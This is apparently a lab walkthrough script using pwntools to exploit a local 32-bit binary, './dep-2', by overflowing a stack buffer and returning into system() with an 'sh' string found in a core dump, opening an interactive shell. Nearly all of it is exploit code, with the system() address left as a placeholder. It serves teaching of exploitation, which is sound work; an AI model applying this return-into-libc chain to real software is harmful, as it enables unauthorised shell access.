#!/usr/bin/env python
"""Ret2libc walkthrough against ./dep-2, driven with pwntools.

The target is run twice.  The first run overflows the stack buffer with
a recognisable pattern so the process crashes and leaves a core file;
the address of an "sh" string on that stack is read back from the core.
The second run replays the overflow, but with the return address
pointing at system() and the "sh" address placed where system() expects
its argument, i.e. a return-into-libc chain instead of injected code.

Values that come from gdb:
  * buffer size 0x88  -- `disas input_func`, the buffer sits at -0x88(%ebp)
  * addr_system       -- `b main`, `run`, `print system` (fill in by hand)
"""
from pwn import *

# Distance from the start of the buffer to the saved ebp (gdb: -0x88(%ebp)).
BUF_SIZE = 0x88
# Whatever lands in the saved-ebp slot; the value itself does not matter.
SAVED_EBP = "BBBB"


def crash_payload():
    """Overflow that leaves 0x43434343 ("CCCC") in the return-address slot."""
    return "A" * BUF_SIZE + SAVED_EBP + "CCCC"


def ret2system_payload(addr_system, addr_of_sh):
    """Overflow that returns into system() with the stack "sh" string as its argument.

    Layout after the saved ebp, one 32-bit word each:
      [ system() ][ system() ][ addr_of_sh ][ addr_of_sh ]
    The first word is the overwritten return address; the second occupies
    the slot system() will itself return to, and the third is the word
    system() reads as its argument.  The trailing duplicate addr_of_sh
    mirrors the original script's layout -- presumably padding; confirm
    against the frame before relying on it.
    """
    return (
        "A" * BUF_SIZE
        + SAVED_EBP
        + p32(addr_system)
        + p32(addr_system)
        + p32(addr_of_sh)
        + p32(addr_of_sh)
    )


# Run 1: crash the target so it dumps core.
target = process("./dep-2")
target.send(crash_payload())
target.wait()

# Read the address of "sh" from the crashed process's stack.
core = Core('core')
addr_of_sh = core.stack.find('sh')
print("Stack %s" % hex(addr_of_sh))

# Placeholder -- replace with the value gdb prints for `print system`.
addr_system = XXXX

# Run 2: replay the overflow with the ret2libc chain and hand over the terminal.
target = process("./dep-2")
target.send(ret2system_payload(addr_system, addr_of_sh))
target.interactive()
quit()